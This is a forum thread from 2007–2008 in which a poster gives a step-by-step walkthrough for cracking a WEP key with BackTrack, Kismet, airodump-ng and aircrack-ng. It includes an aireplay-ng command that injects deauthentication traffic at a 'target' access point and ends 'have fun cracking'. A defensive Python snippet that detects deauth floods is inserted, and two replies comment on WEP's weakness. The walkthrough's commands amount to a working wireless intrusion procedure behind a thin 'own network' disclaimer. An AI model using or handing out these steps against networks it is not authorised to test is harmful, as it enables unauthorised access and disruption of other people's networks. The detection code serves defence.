Tangler Discussion Forums

    Hi all, I was able to figure out how to crack a WEP key fairly easily. Make a note that this is for informational use only, and to test the security of your own wireless access point. I did this using an Acer Ferrari 5000 which uses an Atheros A/B/G wireless chipset (model AR5006EXS). Most Linux distros I've used didn't have wireless drivers for my device, but this distro easily found and enabled my device.

    1. Download BackTrack .iso here http://www.remote-exploit.org/backtrack_download.html - it will take a while but once you have the .iso file, you can use Nero (burn image) to create a bootable CD.
    2. Take a minute to ensure that your wireless card is turned on in Vista or XP. If your laptop has a switch to turn it on or off, make sure it's turned on.
    3. Reboot, insert CD, hit F12 for boot menu, start from CD.
    4. At the prompt, Boot Linux <enter>
    5. Log into BackTrack root/toor
    6. start root shell
    7. Find the program Kismet and start it to find active WAPs - copy the SSID, MAC address, and channel of the target WAP you want to crack. In my case, Kismet enabled monitor mode on ath1 - do not close the app.
    8. in the root shell type in # mkdir /home/dump/
    9. # cd /home/dump/
    10. Now we want to start dumping encrypted packets. To do so, type in # airodump-ng -i -c 6 -b g ath1 -w /home/dump/dump1

    This can take a long time; in my case, overnight, with a lot of traffic from multiple machines, I was able to capture 912075 IVs. The more captured packets, the easier it will be to crack the key. If you're unsure what the command line switches are used for, type in # man airodump-ng at the command prompt. You can see from my statement I am dumping packets captured on channel 6, using band G, using the ath1 Ethernet controller and dumping the results to a file named dump1 in the directory we created.

    11. Hit Ctrl+C to stop the capture.

    12. Now we want to crack the key. At the root shell command prompt type in # aircrack-ng -b MAC_ADDRESS_OF_TARGET_WAP -n 128 /home/dump/dump1-01.ivs

    It may take a little while but aircrack-ng will tell you if it doesn't have enough captured packets. I guessed that (-n 128) the WAP is using 128-bit encryption. If it was 64-bit I would have used (-n 64).

    If you don't have enough packets, and you're not capturing them quickly enough, you may want to use a second laptop booted to BackTrack and run "aireplay-ng" while your first laptop is capturing packets. This is used to create traffic using a deauth attack, I believe. An example of a command that's worked for me is # aireplay-ng ath1 -2 -b MAC_ADDRESS_OF_TARGET -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

    Good luck and have fun cracking!  

    2007-07-26 10:33:40.0
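An added defender-side example, not part of the original post: the traffic-generation step above sends deauthentication frames addressed to ff:ff:ff:ff:ff:ff, and a burst of those is exactly what a wireless monitor on your own network can flag. The log format, the one-second window and the threshold of five frames are constructed assumptions for this example, not any real tool's output or defaults.

```python
import re
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample monitor log (not from any real tool):
# "<epoch seconds> <frame type> <bssid> <destination mac>"
SAMPLE_LOG = """\
999.50  beacon 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff
1000.00 deauth 00:11:22:33:44:55 aa:bb:cc:dd:ee:01
1000.50 data   00:11:22:33:44:55 aa:bb:cc:dd:ee:01
1001.00 deauth 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff
1001.05 deauth 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff
1001.10 deauth 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff
1001.15 deauth 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff
1001.20 deauth 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff
1001.25 deauth 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff
1003.00 deauth 66:77:88:99:aa:bb aa:bb:cc:dd:ee:02
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def detect_deauth_floods(log_text, window=1.0, threshold=5):
    """Slide a time window over deauth frames per BSSID; return one alert
    per BSSID whose deauth count inside the window reaches the threshold.
    A single unicast deauth (a normal disconnect) never trips it."""
    recent = defaultdict(deque)   # bssid -> deque of (timestamp, dst)
    alerts, alerted = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                # skip malformed lines
        ts, ftype, bssid, dst = m.groups()
        if ftype != "deauth":
            continue
        ts = float(ts)
        q = recent[bssid]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:   # drop frames outside the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerts.append({"bssid": bssid, "start": q[0][0], "count": len(q),
                           "broadcast": sum(1 for _, d in q if d == BROADCAST)})
            alerted.add(bssid)      # one alert per BSSID per run
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_LOG):
        print(a)   # prints the one flood from 00:11:22:33:44:55
```

A high broadcast share in the alert is the tell: a legitimate access point disconnects individual stations, it does not deauthenticate everyone five times a second.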

    You shouldn't even use WEP if possible... I suppose it's better than nothing D:

    2008-02-19 18:05:31.0

    It at least means that it takes some effort to get access, thus making the unsecured network down the road more attractive than yours.

    If someone really wants access to your specific network for some reason, then they're going to get in eventually... although better encryption would discourage them further and make it take longer.

    2008-02-20 08:14:35.0